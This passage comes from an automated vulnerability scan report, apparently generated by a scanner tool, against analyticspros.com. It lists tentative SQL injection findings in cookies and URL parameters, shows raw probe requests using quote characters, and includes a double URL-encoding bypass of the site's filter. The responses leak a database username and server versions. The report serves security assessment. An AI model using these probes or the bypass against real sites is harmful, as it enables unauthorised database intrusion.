Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0''; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:26:34 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.145. http://www.analyticspros.com/blog/urchin/121-urchin-7-new-interface-first-look.html [optimizelyBuckets cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/urchin/121-urchin-7-new-interface-first-look.html

Issue detail

The optimizelyBuckets cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the optimizelyBuckets cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/urchin/121-urchin-7-new-interface-first-look.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/consulting.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D'; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:31:01 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/urchin/121-urchin-7-new-interface-first-look.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/consulting.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D''; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:31:01 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:31:06 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:31:06 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23679


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.146. http://www.analyticspros.com/blog/urchin/87-visitor-scoring-with-urchin.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/urchin/87-visitor-scoring-with-urchin.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/urchin'/87-visitor-scoring-with-urchin.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 04:25:02 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/urchin''/87-visitor-scoring-with-urchin.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 04:25:06 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:25:09 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 04:25:10 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23209


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.147. http://www.analyticspros.com/blog/urchin/87-visitor-scoring-with-urchin.html [ki_u cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/urchin/87-visitor-scoring-with-urchin.html

Issue detail

The ki_u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/urchin/87-visitor-scoring-with-urchin.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a'; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:35:09 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/urchin/87-visitor-scoring-with-urchin.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a''; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:35:10 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:35:10 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:35:11 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23156


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.148. http://www.analyticspros.com/blog/urchin/88-urchin-vs-google-analytics.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/urchin/88-urchin-vs-google-analytics.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/urchin/88-urchin-vs-google-analytics.html?1'=1 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:37:30 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/urchin/88-urchin-vs-google-analytics.html?1''=1 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:37:31 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.149. http://www.analyticspros.com/blog/urchin/94-exclude-bots-in-urchin.html [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/urchin/94-exclude-bots-in-urchin.html

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the __utma cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/urchin/94-exclude-bots-in-urchin.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1%2527; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:49:59 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/urchin/94-exclude-bots-in-urchin.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1%2527%2527; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:50:01 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.150. http://www.analyticspros.com/blog/urchin/94-exclude-bots-in-urchin.html [ki_u cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/urchin/94-exclude-bots-in-urchin.html

Issue detail

The ki_u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/urchin/94-exclude-bots-in-urchin.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a'; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 02:10:34 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/urchin/94-exclude-bots-in-urchin.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a''; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 02:10:35 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.151. http://www.analyticspros.com/blog/webanalytics.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/webanalytics.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/webanalytics.html' HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/consulting.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 06:45:29 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/webanalytics.html'' HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/consulting.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 06:45:34 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:45:36 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:45:36 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18626


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.152. http://www.analyticspros.com/blog/webanalytics.html [apros2.0_tpl cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/webanalytics.html

Issue detail

The apros2.0_tpl cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the apros2.0_tpl cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/webanalytics.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/consulting.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0'; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:35:21 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/webanalytics.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/consulting.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0''; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:35:22 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
